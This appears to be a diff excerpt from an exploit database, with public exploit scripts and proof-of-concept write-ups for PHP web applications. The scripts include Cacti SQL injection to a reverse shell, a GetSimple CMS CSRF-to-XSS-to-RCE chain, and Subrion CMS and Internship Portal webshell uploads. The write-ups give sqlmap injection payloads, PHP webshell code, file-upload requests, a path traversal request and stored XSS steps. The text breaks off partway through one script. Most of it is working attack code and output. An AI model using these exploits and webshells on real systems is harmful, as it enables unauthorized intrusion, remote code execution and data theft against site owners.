print("\n[+] SQL Injection:")
print(exploit_request.text)
try:
session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies)
except Exception:
pass
print("[+] Check your nc listener!")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True)
parser.add_argument('-u', metavar='<user>', help='user to log in', required=True)
parser.add_argument('-p', metavar='<password>', help="user's password", required=True)
parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True)
parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True)
args = parser.parse_args()
url = args.t
username = args.u
password = args.p
lhost = args.lhost
lport = args.lport
session = requests.Session()
login(url, username, password, session)
exploit(lhost, lport, session)

166
exploits/php/webapps/49816.py Executable file
View file

@ -0,0 +1,166 @@
# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
# Date: 30/04/201
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
# Vendor: 4Enzo
# Version: v0.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
# Vulnerability Description:
# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.
# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
def xhrRcePayload():
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var gt = decodeURIComponent("%3c");'
payload += 'var lt = decodeURIComponent("%3e");'
payload += 'var h="application/x-www-form-urlencoded";'
payload += 'var u="/admin/theme-edit.php";'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 && xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector("#nonce").value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open("POST",u,true);'
payload += 'xhr2.setRequestHeader("Content-Type",h);'
payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);'
payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open("GET",u,true);'
payload += 'xhr1.responseType="document";'
payload += 'xhr1.send();'
return payload
def csrfPayload():
payload = '<html><body>'
payload += '<form action="'+target+'/admin/load.php?id=CustomJSPlugin" method="POST">'
payload += '<input type="hidden" name="customjs_url_content" value="">'
payload += '<input type="hidden" name="customjs_js_content" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="submit" value="Save Settings">'
payload += '<input type="submit" value="Submit request">'
payload += '</form></body></html>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{}{} connected to Malicious CSRF Site!".format(ok,victim))
print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def sig():
SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
return SIG
def argsetup():
about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args
if __name__ == '__main__':
header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n'
header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)

74
exploits/php/webapps/49823.py Executable file
View file

@ -0,0 +1,74 @@
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10
import requests
import time
#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
"http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
#the upload point
insert_url=url+"/inserty.php"
def fill_details():
global payload
global shellend
global shellstart
print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
#time start
shellstart=int(time.time())
#print(shellstart)
files = {'file':('shell.php',payload,
'image/png', {'Content-Disposition': 'form-data'}
)
}
data = {
"company_name":"some",
"first_name":"some",
"last_name":"some",
"email":"some@some.com",
"gender":"Male",
"insert_button":"Apply",
"terms":"on"
}
r = requests.post(insert_url, data=data, files=files)
if r.status_code == 200:
print("Exploited Intern System Successfully...")
shellend = int(time.time())
#print(shellend)
shell()
else:
print("Exploit Failed")
def shell():
for shellname in range(shellstart, shellend+1):
shellstr=str(shellname)
shell_url=url+"/upload/"+shellstr+"_shell.php"
r = requests.get(shell_url)
if r.status_code == 200:
shell_url=url+"/upload/"+shellstr+"_shell.php"
break
r = requests.get(shell_url)
if r.status_code == 200:
print("Shell Starting...")
while True:
cmd=input("cmd$ ")
r = requests.get(shell_url+"?cmd="+cmd)
print(r.text)
else:
print("File Name Error")
fill_details()

120
exploits/php/webapps/49876.py Executable file
View file

@ -0,0 +1,120 @@
# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
# Date: 17/05/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://subrion.org/
# Software Link: https://github.com/intelliants/subrion
# Version: SubrionCMS 4.2.1
# Tested on: Debian9, Debian 10 and Ubuntu 16.04
# CVE: CVE-2018-19422
# Exploit Requirements: BeautifulSoup library
# https://github.com/intelliants/subrion/issues/801
#!/usr/bin/python3
import requests
import time
import optparse
import random
import string
from bs4 import BeautifulSoup
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
options, args = parser.parse_args()
if not options.url:
print('[+] Specify an url target')
print('[+] Example usage: exploit.py -u http://target-uri/panel')
print('[+] Example help usage: exploit.py -h')
exit()
url_login = options.url
url_upload = options.url + 'uploads/read.json'
url_shell = options.url + 'uploads/'
username = options.user
password = options.passw
session = requests.Session()
def login():
global csrfToken
print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
print('[+] Trying to connect to: ' + url_login)
try:
get_token_request = session.get(url_login)
soup = BeautifulSoup(get_token_request.text, 'html.parser')
csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
print('[+] Success!')
time.sleep(1)
if csrfToken:
print(f"[+] Got CSRF token: {csrfToken}")
print("[+] Trying to log in...")
auth_url = url_login
auth_cookies = {"loader": "loaded"}
auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
auth_data = {"__st": csrfToken, "username": username, "password": password}
auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
if len(auth.text) <= 7000:
print('\n[x] Login failed... Check credentials')
exit()
else:
print('[+] Login Successful!\n')
else:
print('[x] Failed to got CSRF token')
exit()
except requests.exceptions.ConnectionError as err:
print('\n[x] Failed to Connect in: '+url_login+' ')
print('[x] This host seems to be Down')
exit()
return csrfToken
def name_rnd():
global shell_name
print('[+] Generating random name for Webshell...')
shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
time.sleep(1)
print('[+] Generated webshell name: '+shell_name+'\n')
return shell_name
def shell_upload():
print('[+] Trying to Upload Webshell..')
try:
up_url = url_upload
up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
except requests.exceptions.HTTPError as conn:
print('[x] Failed to Upload Webshell in: '+url_upload+' ')
exit()
def code_exec():
try:
url_clean = url_shell.replace('/panel', '')
req = session.get(url_clean + shell_name + '.phar?cmd=id')
if req.status_code == 200:
print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
while True:
cmd = input('$ ')
x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
print(x.text)
else:
print('\n[x] Webshell not found... upload seems to have failed')
except:
print('\n[x] Failed to execute PHP code...')
login()
name_rnd()
shell_upload()
code_exec()

43
exploits/php/webapps/49877.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
# Date: 2021-05-16
# Exploit Author : bwnz
# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
# Version: 1.0
# Tested on: Ubuntu 20.04.2 LTS
# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
# vulnerability to obtain remote code execution.
-----SQL Injection-----
Step 1.) Navigate to the login page and populate the email and password fields.
Step 2.) With Burp Suite running, send and capture the request.
Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
Step 4.) Open a terminal and run the following command:
sqlmap -r <saved item>
Below are the SQLMap results
Parameter: user_email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
----- END -----
----- Authenticated RCE via Arbitrary File Upload -----
# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
Step 1.) After logging in, click the "Initialization" option and "Add System Info".
Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
----- END ------

26
exploits/php/webapps/49988.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
# Date: 05022021
# Exploit Author: Avinash R
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.52729
# Tested on: Windows 10 Pro (No OS restrictions)
# CVE : CVE-202127673
# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
##### Step To Reproduce #####
1) Login to the admin page of Zenario CMS with admin credentials, which is
http://server_ip/zenario/admin.php
2) Click on, New → HTML page to create a new sample page and intercept it
with your interceptor.
3) Just a single quote on the 'cID' parameter will confirm the SQL
injection.
4) After confirming that the 'cID' parameter is vulnerable to SQL
injection, feeding the request to SQLMAP will do the rest of the work for
you.
############ End ############

43
exploits/php/webapps/49996.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas

55
exploits/php/webapps/50090.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A
# Proof of Concept :
1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.
###################### REQUEST ##########################################
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc
####################### RESPONSE #########################################
HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8
Host Name: MRT
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Murat
System Boot Time: 6/25/2021, 2:51:40 PM
System Manufacturer: Dell Inc.
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
############################################################################

161
exploits/php/webapps/50106.txt Normal file
View file

@ -0,0 +1,161 @@
# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP
###########
# PoC 1: #
###########
Request:
========
POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"
camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"
soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"
12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"
1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"
12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"
15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"
windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"
lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"
3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"
500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"
AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"
5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"
9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream
<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"
2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"
accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"
1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--
###########
# PoC 2: #
###########
Request:
========
POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"
6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream
<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--
###########
# Access: #
###########
# Webshell access via:
PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami
# Output:
result: windows10\user

11
exploits/php/webapps/50107.py Executable file
View file

@ -0,0 +1,11 @@
# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows
import requests
print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)

45
exploits/php/webapps/50117.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
# Date: 08/07/2021
# Exploit Author: Subhadip Nag
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP
# Description #
Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password)
2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script>
4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
5) Stored XSS payload is fired
6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
8) Go back and again click 'Manage Type Ticket'
9) Stored XSS payload is fired
10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php
11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update
12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update
14) Logout and click 'Back Home'
15) Our XSS payload successful
# Image PoC : Reference Image #
1) https://ibb.co/g4hFQDV
2) https://ibb.co/frbpf9c
3) https://ibb.co/NtKrc9C
4) https://ibb.co/cFGWhCz
4) https://ibb.co/CMXmN4f
5) https://ibb.co/C0dV0PC
6) https://ibb.co/4ZW8tb3
7) https://ibb.co/3zgFq9b
8) https://ibb.co/wS8wXj8

15
exploits/php/webapps/50127.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
# Date: 14/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/current-book/
# Version: 1.0.1
# Category: Web Application
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Custom Book
3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
4. Click Update Options
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.

107
exploits/php/webapps/50159.py Executable file
View file

@ -0,0 +1,107 @@
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
import os, re, sys, argparse, requests
from termcolor import cprint
def banner():
os.system("cls")
print('''
___________ __
\_ _____/__ __ ____ _____/ |_
| __)_\ \/ // __ \ / \ __\\
| \\\\ /\ ___/| | \ |
/_______ / \_/ \___ >___| /__|
\/ \/ \/
Registration System
--[Authentication Bypass and RCE]--
@jjavierolmedo
''')
def get_args():
